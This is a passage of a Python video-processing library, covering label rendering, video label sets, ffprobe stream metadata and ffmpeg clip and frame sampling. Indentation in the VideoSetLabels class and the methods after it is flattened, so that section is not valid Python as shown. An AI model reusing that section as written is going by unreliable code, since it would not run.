                deep copying objects). By default, this is False
        Returns:
            a dictionary mapping frame numbers to VideoFrameLabels instances
        """
        video_attrs = self._get_video_attrs()
        # Render all object/event frames up front so that the per-frame loop
        # below only performs dictionary lookups
        dobjs_map = self._render_all_object_frames(in_place)
        devents_map = self._render_all_event_frames(in_place)
        frame_labels_map = {}
        for frame_number in self._video_labels.support:
            dobjs = dobjs_map.get(frame_number, None)
            devents = devents_map.get(frame_number, None)
            frame_labels_map[frame_number] = self._render_frame(
                frame_number, video_attrs, dobjs, devents, in_place
            )
        return frame_labels_map
    def _render_frame(
        self, frame_number, video_attrs, dobjs, devents, in_place
    ):
        # Builds the VideoFrameLabels for one frame from the pre-rendered
        # video-level attributes, detected objects, and detected events
        labels = self._video_labels
        # Base VideoFrameLabels
        if labels.has_frame(frame_number):
            frame_labels = labels.get_frame(frame_number)
            if not in_place:
                frame_labels = deepcopy(frame_labels)
        else:
            frame_labels = VideoFrameLabels(frame_number=frame_number)
        # Render video-level attributes
        if video_attrs is not None:
            #
            # Prepend video-level attributes
            #
            # We cannot avoid `deepcopy` here because video-level attributes
            # must be embedded in each frame
            #
            frame_labels.attrs.prepend_container(deepcopy(video_attrs))
        # Render objects
        if dobjs is not None:
            frame_labels.add_objects(dobjs)
        # Render events
        if devents is not None:
            frame_labels.add_events(devents)
        return frame_labels
    def _render_object_frame(self, frame_number, in_place):
        # Renders the `DetectedObject`s for one frame, or None if the video
        # has no video-level objects
        labels = self._video_labels
        if not labels.has_video_objects:
            return None
        r = etao.VideoObjectContainerFrameRenderer(labels.objects)
        return r.render_frame(frame_number, in_place=in_place)
    def _render_all_object_frames(self, in_place):
        # Renders the `DetectedObject`s for every frame, keyed by frame number
        labels = self._video_labels
        if not labels.has_video_objects:
            return {}
        r = etao.VideoObjectContainerFrameRenderer(labels.objects)
        return r.render_all_frames(in_place=in_place)
    def _render_event_frame(self, frame_number, in_place):
        # Renders the `DetectedEvent`s for one frame, or None if the video
        # has no video-level events
        labels = self._video_labels
        if not labels.has_video_events:
            return None
        r = etae.VideoEventContainerFrameRenderer(labels.events)
        return r.render_frame(frame_number, in_place=in_place)
    def _render_all_event_frames(self, in_place):
        # Renders the `DetectedEvent`s for every frame, keyed by frame number
        labels = self._video_labels
        if not labels.has_video_events:
            return {}
        r = etae.VideoEventContainerFrameRenderer(labels.events)
        return r.render_all_frames(in_place=in_place)
    def _get_video_attrs(self):
        # Returns a copy of the video-level attributes marked as constant, or
        # None if the video has no video-level attributes
        labels = self._video_labels
        if not labels.has_video_attributes:
            return None
        # There's no need to avoid `deepcopy` here when `in_place == True`
        # because copies of video-level attributes must be made for each frame
        video_attrs = deepcopy(labels.attrs)
        for attr in video_attrs:
            attr.constant = True
        return video_attrs
class VideoLabelsSpatiotemporalRenderer(etal.LabelsSpatiotemporalRenderer):
    """Renders VideoLabels in spatiotemporal format.
    See the VideoLabels class docstring for the spatiotemporal format spec.
    """

    _LABELS_CLS = VideoLabels

    def __init__(self, video_labels):
        """Creates a VideoLabelsSpatiotemporalRenderer instance.
        Args:
            video_labels: a VideoLabels
        """
        self._video_labels = video_labels

    def render(self, in_place=False):
        """Renders the VideoLabels in spatiotemporal format.
        Args:
            in_place: whether to perform the rendering in-place. By default,
                this is False
        Returns:
            a VideoLabels
        """
        if in_place:
            labels = self._video_labels
        else:
            labels = deepcopy(self._video_labels)

        # Convert any existing `VideoObject`s and `VideoEvent`s to
        # spatiotemporal format, in-place
        etao.VideoObjectContainerSpatiotemporalRenderer(labels.objects).render(
            in_place=True
        )
        etae.VideoEventContainerSpatiotemporalRenderer(labels.events).render(
            in_place=True
        )

        # Lift spatiotemporal content out of the individual frames and into
        # the video-level containers
        attrs, objects, events = strip_spatiotemporal_content_from_frames(
            labels
        )
        labels.attrs.add_container(attrs)
        labels.add_objects(objects)
        labels.add_events(events)
        labels.remove_empty_frames()
        return labels
def strip_spatiotemporal_content_from_frames(video_labels):
    """Strips the spatiotemporal content from the frames of the given
    VideoLabels.
    The input labels are modified in-place.
    Args:
        video_labels: a VideoLabels
    Returns:
        attrs: an AttributeContainer of constant frame attributes. By
            convention, these attributes are no longer marked as constant, as
            this is assumed to be implicit
        objects: a VideoObjectContainer containing the objects that were
            stripped from the frames
        events: a VideoEventContainer containing the events that were stripped
            from the frames
    """
    # Pop objects, events, and constant attributes out of each frame
    constant_attrs = {}
    detected_objects = etao.DetectedObjectContainer()
    detected_events = etae.DetectedEventContainer()
    for frame_labels in video_labels.iter_frames():
        detected_objects.add_container(frame_labels.pop_objects())
        detected_events.add_container(frame_labels.pop_events())
        for const_attr in frame_labels.attrs.pop_constant_attrs():
            # @todo could verify here that duplicate constant attributes are
            # exactly equal, as they should be
            constant_attrs[const_attr.name] = const_attr

    # Constant-ness is implicit for video-level attributes, so unmark it
    attrs = etad.AttributeContainer()
    for attr in itervalues(constant_attrs):
        attr.constant = False
        attrs.add(attr)

    # Collect the per-frame detections into video-level containers
    objects = etao.VideoObjectContainer.from_detections(detected_objects)
    events = etae.VideoEventContainer.from_detections(detected_events)
    return attrs, objects, events
class VideoSetLabels(etal.LabelsSet):
"""Class encapsulating labels for a set of videos.
VideoSetLabels support item indexing by the `filename` of the VideoLabels
instances in the set.
VideoSetLabels instances behave like defaultdicts: new VideoLabels
instances are automatically created if a non-existent filename is accessed.
VideoLabels without filenames may be added to the set, but they cannot be
accessed by `filename`-based lookup.
Attributes:
videos: an OrderedDict of VideoLabels with filenames as keys
schema: a VideoLabelsSchema describing the schema of the labels
"""
_ELE_ATTR = "videos"
_ELE_KEY_ATTR = "filename"
_ELE_CLS = VideoLabels
_ELE_CLS_FIELD = "_LABELS_CLS"
def sort_by_filename(self, reverse=False):
"""Sorts the VideoLabels in this instance by filename.
VideoLabels without filenames are always put at the end of the set.
Args:
reverse: whether to sort in reverse order. By default, this is
False
"""
self.sort_by("filename", reverse=reverse)
def clear_video_attributes(self):
"""Removes all video-level attributes from all VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_video_attributes()
def clear_frame_attributes(self):
"""Removes all frame-level attributes from all VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_frame_attributes()
def clear_video_objects(self):
"""Removes all `VideoObject`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_video_objects()
def clear_detected_objects(self):
"""Removes all `DetectedObject`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_detected_objects()
def clear_objects(self):
"""Removes all `VideoObject`s and `DetectedObject`s from all
VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_objects()
def clear_video_events(self):
"""Removes all `VideoEvent`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_video_events()
def clear_detected_events(self):
"""Removes all `DetectedEvent`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_detected_events()
def clear_events(self):
"""Removes all `VideoEvent`s and `DetectedEvent`s from all VideoLabels
in the set.
"""
for video_labels in self:
video_labels.clear_events()
def get_filenames(self):
"""Returns the set of filenames of VideoLabels in the set.
Returns:
the set of filenames
"""
return set(vl.filename for vl in self if vl.filename)
def remove_objects_without_attrs(self, labels=None):
    """Removes objects from the VideoLabels in the set that do not have
    attributes.

    Args:
        labels: an optional list of object label strings to which to
            restrict attention when filtering. By default, all objects are
            processed
    """
    for video_labels in self:
        video_labels.remove_objects_without_attrs(labels=labels)

@classmethod
def from_video_labels_patt(cls, video_labels_patt):
    """Creates a VideoSetLabels from a pattern of VideoLabels files.

    Args:
        video_labels_patt: a pattern with one or more numeric sequences
            for VideoLabels files on disk

    Returns:
        a VideoSetLabels instance
    """
    return cls.from_labels_patt(video_labels_patt)
class BigVideoSetLabels(VideoSetLabels, etas.BigSet):
    """A BigSet of VideoLabels.

    Behaves identically to VideoSetLabels except that each VideoLabels is
    stored on disk.

    BigVideoSetLabels store a `backing_dir` attribute that specifies the path
    on disk to the serialized elements. If a backing directory is explicitly
    provided, the directory will be maintained after the BigVideoSetLabels
    object is deleted; if no backing directory is specified, a temporary
    backing directory is used and is deleted when the BigVideoSetLabels
    instance is garbage collected.

    Attributes:
        videos: an OrderedDict whose keys are filenames and whose values are
            uuids for locating VideoLabels on disk
        schema: a VideoLabelsSchema describing the schema of the labels
        backing_dir: the backing directory in which the VideoLabels
            are/will be stored
    """

    def __init__(self, videos=None, schema=None, backing_dir=None):
        """Creates a BigVideoSetLabels instance.

        Args:
            videos: an optional dictionary or list of (key, uuid) tuples for
                elements in the set
            schema: an optional VideoLabelsSchema to enforce on the object.
                By default, no schema is enforced
            backing_dir: an optional backing directory in which the
                VideoLabels are/will be stored. If omitted, a temporary
                backing directory is used
        """
        # Both bases are initialized explicitly; MRO-based `super()` calls
        # are not used here because the bases take different kwargs
        etas.BigSet.__init__(self, backing_dir=backing_dir, videos=videos)
        etal.HasLabelsSchema.__init__(self, schema=schema)

    def empty_set(self):
        """Returns an empty in-memory VideoSetLabels version of this
        BigVideoSetLabels.

        Returns:
            an empty VideoSetLabels
        """
        return VideoSetLabels(schema=self.schema)

    def filter_by_schema(self, schema):
        """Removes objects/attributes from the VideoLabels in the set that
        are not compliant with the given schema.

        Args:
            schema: a VideoLabelsSchema
        """
        # Each element must be read from and written back to disk, since
        # elements of a BigSet are not held in memory
        for key in self.keys():
            labels = self[key]
            labels.filter_by_schema(schema)
            self[key] = labels

    def set_schema(self, schema, filter_by_schema=False, validate=False):
        """Sets the enforced schema to the given VideoLabelsSchema.

        Args:
            schema: a VideoLabelsSchema to assign
            filter_by_schema: whether to filter labels that are not compliant
                with the schema. By default, this is False
            validate: whether to validate that the labels (after filtering,
                if applicable) are compliant with the new schema. By default,
                this is False

        Raises:
            LabelsSchemaError: if `validate` was `True` and this set contains
                labels that are not compliant with the schema
        """
        self.schema = schema
        for key in self.keys():
            labels = self[key]
            labels.set_schema(
                schema, filter_by_schema=filter_by_schema, validate=validate
            )
            self[key] = labels

    def remove_objects_without_attrs(self, labels=None):
        """Removes all objects from the BigVideoSetLabels that do not have
        attributes.

        Args:
            labels: an optional list of object label strings to which to
                restrict attention when filtering. By default, all objects
                are processed
        """
        for key in self.keys():
            video_labels = self[key]
            video_labels.remove_objects_without_attrs(labels=labels)
            self[key] = video_labels
class VideoStreamInfo(etas.Serializable):
    """Class encapsulating the stream info for a video, as reported by
    ffprobe.
    """

    def __init__(self, stream_info, format_info, mime_type=None):
        """Creates a VideoStreamInfo instance.

        Args:
            stream_info: a dictionary of video stream info
            format_info: a dictionary of video format info
            mime_type: (optional) the MIME type of the video
        """
        self.stream_info = stream_info
        self.format_info = format_info
        self._mime_type = mime_type

    @property
    def frame_size(self):
        """The (width, height) of each frame.

        Raises:
            VideoStreamInfoError: if the frame size could not be determined
        """
        try:
            # Must check if the video is rotated!
            rotation = int(self.stream_info["tags"]["rotate"])
        except (KeyError, ValueError):
            rotation = 0

        try:
            width = int(self.stream_info["width"])
            height = int(self.stream_info["height"])
            if (rotation // 90) % 2:
                # Odd multiples of 90 degrees swap the displayed dimensions
                logger.debug(
                    "Found video with rotation %d; swapping width and height",
                    rotation,
                )
                width, height = height, width

            return width, height
        except (KeyError, ValueError):
            raise VideoStreamInfoError(
                "Unable to determine frame size of the video"
            )

    @property
    def aspect_ratio(self):
        """The aspect ratio (width / height) of the video.

        Raises:
            VideoStreamInfoError: if the frame size could not be determined
        """
        width, height = self.frame_size
        return width * 1.0 / height

    @property
    def frame_rate(self):
        """The frame rate of the video.

        Raises:
            VideoStreamInfoError: if the frame rate could not be determined
        """
        try:
            try:
                num, denom = self.stream_info["avg_frame_rate"].split("/")
                return float(num) / float(denom)
            except ZeroDivisionError:
                # `avg_frame_rate` was "0/0"; fall back to `r_frame_rate`
                num, denom = self.stream_info["r_frame_rate"].split("/")
                return float(num) / float(denom)
        except (KeyError, ValueError):
            raise VideoStreamInfoError(
                "Unable to determine frame rate of the video"
            )

    @property
    def total_frame_count(self):
        """The total number of frames in the video, or -1 if it could not be
        determined.
        """
        try:
            # try `nb_frames`
            return int(self.stream_info["nb_frames"])
        except KeyError:
            pass

        try:
            # try `duration` x `frame rate`
            return int(round(self.duration * self.frame_rate))
        except VideoStreamInfoError:
            pass

        try:
            #
            # Fallback to `duration_ts` as a last resort. This will not be
            # accurate for videos with `time_base` != 1, but the assumption is
            # that one of the preceding methods will have already worked for
            # videos. This is here as a last resort for sequences of images,
            # where `duration_ts` seems to directly contain the number of
            # frames.
            #
            return int(self.stream_info["duration_ts"])
        except KeyError:
            pass

        logger.warning("Unable to determine total frame count; returning -1")
        return -1

    @property
    def duration(self):
        """The duration of the video, in seconds, or -1 if it could not be
        determined.
        """
        try:
            # try `duration`
            return float(self.stream_info["duration"])
        except KeyError:
            pass

        try:
            # try `duration_ts` x `time_base`
            duration_ts = float(self.stream_info["duration_ts"])
            num, denom = self.stream_info["time_base"].split("/")
            return duration_ts * float(num) / float(denom)
        except KeyError:
            pass

        try:
            # try `duration` from format info
            return float(self.format_info["duration"])
        except KeyError:
            pass

        logger.warning("Unable to determine duration; returning -1")
        return -1

    @property
    def size_bytes(self):
        """The size of the video on disk, in bytes, or -1 if it could not be
        determined.
        """
        try:
            return int(self.format_info["size"])
        except KeyError:
            pass

        logger.warning("Unable to determine video size; returning -1")
        return -1

    @property
    def mime_type(self):
        """The MIME type of the video, or None if it is not available."""
        return self._mime_type

    @property
    def encoding_str(self):
        """The video encoding string, or "" if it could not be determined."""
        _encoding_str = str(self.stream_info.get("codec_tag_string", ""))
        if not _encoding_str:
            #
            # Bug fix: `str()` always returns a string, so the previous
            # `if _encoding_str is None` check could never fire and the
            # warning was unreachable; warn on the empty string instead
            #
            logger.warning("Unable to determine encoding string")

        return _encoding_str

    def attributes(self):
        """Returns the list of class attributes that will be serialized."""
        return self.custom_attributes(dynamic=True)

    @classmethod
    def build_for(cls, video_path, mime_type=None, verbose=False):
        """Builds a VideoStreamInfo instance for the given video.

        Args:
            video_path: the path to the video
            mime_type: the MIME type of the video, if already known
            verbose: whether to generously log the process of extracting the
                stream info. By default, this is False

        Returns:
            a VideoStreamInfo instance
        """
        if verbose:
            logger.info("Getting stream info for '%s'", video_path)

        stream_info, format_info = _get_stream_info(
            video_path, verbose=verbose
        )

        if verbose:
            logger.info("Found format info: %s", etas.json_to_str(format_info))
            logger.info(
                "Found video stream: %s", etas.json_to_str(stream_info)
            )

        if mime_type is None:
            mime_type = etau.guess_mime_type(video_path)

        return cls(stream_info, format_info, mime_type=mime_type)

    @classmethod
    def from_dict(cls, d):
        """Constructs a VideoStreamInfo from a JSON dictionary.

        Args:
            d: a JSON dictionary

        Returns:
            a VideoStreamInfo
        """
        stream_info = d["stream_info"]
        format_info = d["format_info"]
        mime_type = d.get("mime_type", None)
        return cls(stream_info, format_info, mime_type=mime_type)
class VideoStreamInfoError(Exception):
    """Exception raised when a problem with a VideoStreamInfo occurs."""
def _get_stream_info(inpath, verbose=False):
    # Runs ffprobe on `inpath` and returns a (stream_info, format_info)
    # tuple of dictionaries parsed from its JSON output
    ffprobe = FFprobe(
        opts=[
            "-show_format",   # get format info
            "-show_streams",  # get stream info
            "-print_format",  # return in JSON format
            "json",
        ]
    )
    info = etas.load_json(ffprobe.run(inpath, decode=True, verbose=verbose))

    format_info = info["format"]

    # Pick the first video stream, falling back to the first stream of any
    # type if no video stream is present
    video_streams = [s for s in info["streams"] if s["codec_type"] == "video"]
    if not video_streams:
        logger.warning("No video stream found; defaulting to first stream")
        stream_info = info["streams"][0]
    else:
        if len(video_streams) > 1:
            logger.warning("Found multiple video streams; using first stream")

        stream_info = video_streams[0]

    return stream_info, format_info
def get_frame_rate(inpath):
    """Gets the frame rate of the input video.

    Args:
        inpath: video path

    Returns:
        the frame rate
    """
    stream_info = VideoStreamInfo.build_for(inpath)
    return stream_info.frame_rate
def get_frame_size(inpath):
    """Gets the frame (width, height) of the input video.

    Args:
        inpath: video path

    Returns:
        the (width, height) of the video frames
    """
    stream_info = VideoStreamInfo.build_for(inpath)
    return stream_info.frame_size
def get_frame_count(inpath):
    """Gets the number of frames in the input video.

    Args:
        inpath: video path

    Returns:
        the frame count, or -1 if it could not be determined
    """
    stream_info = VideoStreamInfo.build_for(inpath)
    return stream_info.total_frame_count
def get_duration(inpath):
    """Gets the duration of the video, in seconds.

    Args:
        inpath: video path

    Returns:
        the duration of the video, in seconds, or -1 if it could not be
        determined
    """
    stream_info = VideoStreamInfo.build_for(inpath)
    return stream_info.duration
def get_encoding_str(inpath):
    """Gets the encoding string of the input video.

    Args:
        inpath: video path

    Returns:
        the encoding string
    """
    stream_info = VideoStreamInfo.build_for(inpath)
    return stream_info.encoding_str
def get_raw_frame_number(raw_frame_rate, raw_frame_count, fps, sampled_frame):
    """Gets the raw frame number corresponding to the given sampled frame
    number.

    This function assumes that the sampling was performed using the command::

        FFmpeg(fps=fps).run(raw_video_path, ...)

    Args:
        raw_frame_rate: the frame rate of the raw video
        raw_frame_count: the number of frames in the raw video
        fps: the sampling rate that was used
        sampled_frame: the sampled frame number

    Returns:
        raw_frame: the raw frame number from the input video corresponding to
            the given sampled frame number
    """
    # Number of raw frames spanned by each sampled frame
    step = raw_frame_rate / (1.0 * fps)

    # Center-of-interval estimate, clamped to the last raw frame
    candidate = np.ceil(step * (sampled_frame - 0.5))
    return int(np.minimum(candidate, raw_frame_count))
def read_video_as_array(video_path):
    """Reads the video from the given path into an in-memory array.

    CAUTION: in-memory videos are huge; use this at your own risk!

    Args:
        video_path: the path to the video to load

    Returns:
        a numpy array of size (num_frames, height, width, num_channels)
    """
    with FFmpegVideoReader(video_path) as reader:
        return np.asarray(list(reader))
def get_frame_range_for_clip(video_path, start_time=None, duration=None):
    """Gets a FrameRange instance describing the specified range of frames in
    the given video.

    Args:
        video_path: the path to the video
        start_time: the start timestamp, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
            beginning of the video is used
        duration: the clip duration, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
            extends to the end of the video

    Returns:
        a FrameRange
    """
    metadata = VideoMetadata.build_for(video_path)

    if start_time is not None:
        start_time = etaf.timestamp_to_seconds(start_time)
    else:
        start_time = 0

    start_frame = metadata.get_frame_number(timestamp=start_time)

    if duration is not None:
        #
        # Bug fix: per the docstring, `duration` may be an "HH:MM:SS.XXX"
        # string, so it must be converted to seconds before adding it to the
        # numeric `start_time` (previously a string duration raised a
        # TypeError here)
        #
        stop_time = start_time + etaf.timestamp_to_seconds(duration)
        stop_frame = metadata.get_frame_number(timestamp=stop_time)
    else:
        stop_frame = metadata.total_frame_count

    return etaf.FrameRanges.build_simple(start_frame, stop_frame)
def extract_clip(
    video_path, output_path, start_time=None, duration=None, fast=False
):
    """Extracts the specified clip from the video.

    When fast=False, the following ffmpeg command is used::

        # Slower, more accurate option
        ffmpeg -ss <start_time> -i <video_path> -t <duration> <output_path>

    When fast is True, the following two-step ffmpeg process is used::

        # Faster, less accurate option
        ffmpeg -ss <start_time> -i <video_path> -t <duration> -c copy <tmp_path>
        ffmpeg -i <tmp_path> <output_path>

    Args:
        video_path: the path to the video
        output_path: the path to write the extracted video clip
        start_time: the start timestamp, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
            beginning of the video is used
        duration: the clip duration, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
            extends to the end of the video
        fast: whether to use a faster-but-potentially-less-accurate strategy
            to extract the clip. By default, the slow accurate strategy is
            used
    """
    #
    # @todo using FFmpeg directly here may not yield exact alignment with
    # frame numbers generated by FFmpegVideoReader, VideoProcessor, etc.
    # Should we use VideoProcessor here to ensure alignment?
    #

    # Numeric timestamps are rendered as "SS.XXX" strings for ffmpeg
    in_opts = ["-vsync", "0"]
    if start_time is not None:
        if not etau.is_str(start_time):
            start_time = "%.3f" % start_time

        in_opts += ["-ss", start_time]

    out_opts = ["-vsync", "0"]
    if duration is not None:
        if not etau.is_str(duration):
            duration = "%.3f" % duration

        out_opts += ["-t", duration]

    if not fast:
        # Extract clip carefully and accurately by decoding every frame
        FFmpeg(in_opts=in_opts, out_opts=out_opts).run(video_path, output_path)
        return

    with etau.TempDir() as tmp_dir:
        tmp_path = os.path.join(tmp_dir, os.path.basename(output_path))

        # Extract clip as accurately and quickly as possible by only touching
        # key frames. May leave blank frames in the video
        fast_ffmpeg = FFmpeg(
            in_opts=in_opts, out_opts=out_opts + ["-c", "copy"]
        )
        fast_ffmpeg.run(video_path, tmp_path)

        # Clean up fast output by re-encoding the extracted clip
        # Note that this may not exactly correspond to the slow, accurate
        # implementation above
        FFmpeg(out_opts=["-vsync", "0"]).run(tmp_path, output_path)
def extract_clip_frames(
    video_path,
    output_patt,
    start_time=None,
    duration=None,
    keep_source_frame_numbers=False,
):
    """Extracts the frames of the specified clip from the video.

    Args:
        video_path: the path to the video
        output_patt: the pattern to which to write the extracted frames, like
            "/path/to/frames/%06d.png"
        start_time: the start timestamp, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
            beginning of the video is used
        duration: the clip duration, which can either be a float value of
            seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
            extends to the end of the video
        keep_source_frame_numbers: whether to write the output frames with
            their frame numbers from the source video. If False (the default),
            the output frames are written with frame numbers starting from 1
    """
    frames = get_frame_range_for_clip(
        video_path, start_time=start_time, duration=duration
    )

    with FFmpegVideoReader(video_path, frames=frames) as reader:
        for idx, img in enumerate(reader, 1):
            if keep_source_frame_numbers:
                frame_number = reader.frame_number
            else:
                frame_number = idx

            etai.write(img, output_patt % frame_number)
def extract_frame(video_path, output_path, start_time=None):
    """Extracts a single frame from the local video or from the live stream
    and saves it to an image.

    This extraction function is the simplest of the extract commands in this
    video code and strictly extracts a single frame either from the beginning
    of a video or stream or at some point in the video or stream.

    Uses the following ffmpeg command::

        ffmpeg -y -i <video_path> -ss <start_time> -vframes 1 ${output_path} \
            >/dev/null 2>&1

    Args:
        video_path: the path or m3u8 stream to a video
        output_path: the path to the image to write the frame
        start_time: a string in the ffmpeg time duration format, as follows,
            [-][HH:]MM:SS[.m...]
            https://ffmpeg.org/ffmpeg-utils.html#time-duration-syntax
    """
    in_opts = ["-vsync", "0"]
    if start_time is not None:
        if not etau.is_str(start_time):
            # Render numeric timestamps as "SS.XXX" strings for ffmpeg
            start_time = "%.3f" % start_time

        in_opts += ["-ss", start_time]

    out_opts = ["-vsync", "0", "-vframes", "1"]
    FFmpeg(in_opts=in_opts, out_opts=out_opts).run(video_path, output_path)
def _make_ffmpeg_select_arg(frames):
ss = "+".join(["eq(n\\,%d)" % (f - 1) for f in frames])
return "select='%s'" % ss
def sample_select_frames(
    video_path, frames, output_patt=None, size=None, fast=False
):
    """Samples the specified frames of the video.

    This method is *intentionally* designed to be extremely graceful. It will
    sample whatever frames it can from the video you provide and will
    gracefully exit rather than raising an error if `ffmpeg` cannot understand
    some frames of the video you provide.

    When `fast=False`, this implementation uses VideoProcessor.

    When `fast=True`, this implementation uses ffmpeg's `-vf select` option.
    In this case, it may resort to `fast=False` internally if one of the
    following conditions occur:

        (a) more than 131072 frames are requested. This is a limitation of
            `subprocess` (cf. https://stackoverflow.com/q/29801975)

        (b) the fast implementation failed to generate at least 90%% of the
            target frames. This can happen if `ffmpeg -vf select` is confused
            by the the video it encounters. We have empirically found that
            VideoProcessor may be able to extract more frames in such cases

    Args:
        video_path: the path to the video
        frames: a sorted list of frame numbers to sample
        output_patt: an optional output pattern like "/path/to/frames-%d.png"
            specifying where to write the sampled frames. If omitted, the
            frames are instead returned in an in-memory list
        size: an optional (width, height) to resize the sampled frames. By
            default, the native dimensions of the frames are used
        fast: whether to use a native ffmpeg method to perform the extraction.
            While faster, this may be inconsistent with other video processing
            methods in ETA. By default, this is False

    Returns:
        If `output_patt != None`, this function returns None.

        If `output_patt == None`, this method returns an (imgs, frames) tuple
        where `imgs` is the list of sampled frames, and `frames` is the list
        of frames that were succesfully sampled. If no errors were
        encountered, the output `frames` will match the input `frames`
    """
    if not fast:
        return _sample_select_frames_slow(video_path, frames, output_patt, size)

    try:
        return _sample_select_frames_fast(video_path, frames, output_patt, size)
    except SampleSelectFramesError as err:
        # Fast mode could not complete; fall back to the slow implementation
        logger.warning("Select frames fast mode failed: '%s'", err)
        logger.info("Reverting to `fast=False`")
        return _sample_select_frames_slow(video_path, frames, output_patt, size)
class SampleSelectFramesError(Exception):
    """Exception raised when the `sample_select_frames` method encounters an
    error.
    """
def _sample_select_frames_fast(video_path, frames, output_patt, size):
    # Samples `frames` from `video_path` using ffmpeg's `-vf select` filter,
    # writing them to `output_patt` if provided, else returning an
    # (imgs, out_frames) tuple of in-memory images and the frame numbers
    # that were successfully sampled.
    #
    # Raises SampleSelectFramesError when the caller should fall back to the
    # slow (VideoProcessor-based) implementation.

    #
    # As per https://stackoverflow.com/q/29801975, one cannot pass an
    # argument of length > 131072 to subprocess. So, we have to make sure the
    # user isn't requesting too many frames to handle
    #
    select_arg_str = _make_ffmpeg_select_arg(frames)
    if len(select_arg_str) > 131072:
        raise SampleSelectFramesError(
            "Number of frames (%d) requested too large" % len(frames)
        )

    # If reading into memory, use `png` to ensure lossless-ness
    ext = os.path.splitext(output_patt)[1] if output_patt else ".png"

    #
    # Analogous to FFmpegVideoReader, our approach here is to gracefully
    # fail and just give the user however many frames we can...
    #
    with etau.TempDir() as d:
        # Sample frames to disk temporarily; ffmpeg numbers its outputs
        # sequentially from 1 via the "%06d" placeholder
        tmp_patt = os.path.join(d, "frame-%06d" + ext)
        ffmpeg = FFmpeg(
            size=size, out_opts=["-vf", select_arg_str, "-vsync", "0"]
        )
        try:
            ffmpeg.run(video_path, tmp_patt)
        except etau.ExecutableRuntimeError as e:
            # Graceful failure if frames couldn't be sampled; whatever frames
            # ffmpeg managed to write before failing are still used below
            logger.warning(etau.summarize_long_str(str(e), 500))
            logger.warning(
                "A sampling error occured; attempting to gracefully continue"
            )

        # NOTE(review): mapping the i-th sampled file back to `frames[i - 1]`
        # assumes ffmpeg drops frames only from the tail of the request;
        # mid-stream failures would misalign this mapping — confirm
        sampled_frames = etau.parse_pattern(tmp_patt)
        out_frames = [frames[i - 1] for i in sampled_frames]
        num_frames = len(sampled_frames)
        num_target_frames = len(frames)

        # Warn user if not all frames were sampled
        if num_frames < num_target_frames:
            logger.warning(
                "Only %d/%d expected frames were sampled",
                num_frames,
                num_target_frames,
            )

        #
        # If an insufficient number of frames were successfully sampled,
        # revert to slow mode
        #
        target_percent_complete = 0.9  # warning: magic number
        percent_complete = num_frames / num_target_frames
        if percent_complete < target_percent_complete:
            raise SampleSelectFramesError(
                "We only managed to sample %.1f%% of the frames; this is "
                "below our target of %.1f%%, so let's try slow mode"
                % (100 * percent_complete, 100 * target_percent_complete)
            )

        # Move frames into place with correct output names
        if output_patt is not None:
            for sample_idx, frame_number in zip(sampled_frames, out_frames):
                tmp_path = tmp_patt % sample_idx
                outpath = output_patt % frame_number
                etau.move_file(tmp_path, outpath)

            return None

        # Return frames into memory
        imgs = []
        for sample_idx in sampled_frames:
            imgs.append(etai.read(tmp_patt % sample_idx))

        return imgs, out_frames
def _sample_select_frames_slow(video_path, frames, output_patt, size):
    # Samples `frames` from `video_path` frame-accurately. Writes them to
    # `output_patt` if provided (returning None); otherwise returns an
    # (imgs, out_frames) tuple of in-memory images and their frame numbers
    do_resize = size is not None

    if output_patt:
        # Sample frames to disk via VideoProcessor
        processor = VideoProcessor(
            video_path, frames=frames, out_images_path=output_patt
        )
        with processor:
            for img in processor:
                if do_resize:
                    img = etai.resize(img, *size)

                processor.write(img)

        return None

    # Sample frames in memory via FFmpegVideoReader
    imgs = []
    out_frames = []
    with FFmpegVideoReader(video_path, frames=frames) as reader:
        for img in reader:
            if do_resize:
                img = etai.resize(img, *size)

            imgs.append(img)
            out_frames.append(reader.frame_number)

    return imgs, out_frames
def sample_first_frames(imgs_or_video_path, k, stride=1, size=None):
    """Samples the first k frames in a video.

    Args:
        imgs_or_video_path: can be either the path to the input video or an
            array of frames of size (num_frames, height, width, num_channels)
        k: number of frames to extract
        stride: number of frames to be skipped in between. By default, a
            contiguous array of frames is extracted
        size: an optional (width, height) to resize the sampled frames. By
            default, the native dimensions of the frames are used

    Returns:
        a numpy array of size [k, height, width, num_channels]
    """
    if etau.is_str(imgs_or_video_path):
        # Read the requested frames from disk
        frames = list(range(1, stride * k + 1, stride))
        with FFmpegVideoReader(imgs_or_video_path, frames=frames) as reader:
            imgs_out = [img for img in reader]
    else:
        # Slice the requested frames from the in-memory tensor
        imgs_out = imgs_or_video_path[: (k * stride) : stride]

    # Duplicate the last frame as needed so exactly k frames are returned
    num_missing = k - len(imgs_out)
    if num_missing > 0:
        imgs_out = np.asarray(imgs_out)
        last_frame = imgs_out[-1][np.newaxis]
        imgs_out = np.concatenate(
            (imgs_out, np.repeat(last_frame, num_missing, axis=0))
        )

    # Resize frames, if necessary
    if size is not None:
        imgs_out = [etai.resize(img, *size) for img in imgs_out]

    return np.array(imgs_out)
def uniformly_sample_frames(imgs_or_video_path, k, size=None):
    """Uniformly samples k frames from the video, always including the first
    and last frames.

    If k is larger than the number of frames in the video, duplicate frames
    will be included as necessary so that k frames are always returned.

    Args:
        imgs_or_video_path: can be either the path to the input video or an
            array of frames of size (num_frames, height, width, num_channels)
        k: the number of frames to extract
        size: an optional (width, height) to resize the sampled frames. By
            default, the native dimensions of the frames are used

    Returns:
        a numpy array of size [k, height, width, num_channels]
    """
    is_video = etau.is_str(imgs_or_video_path)
    if is_video:
        video_path = imgs_or_video_path
    else:
        imgs = imgs_or_video_path

    num_frames = get_frame_count(video_path) if is_video else len(imgs)

    #
    # Compute 1-based frame numbers spanning the entire video
    #
    # Bug fix: the upper bound here must be `num_frames`, not
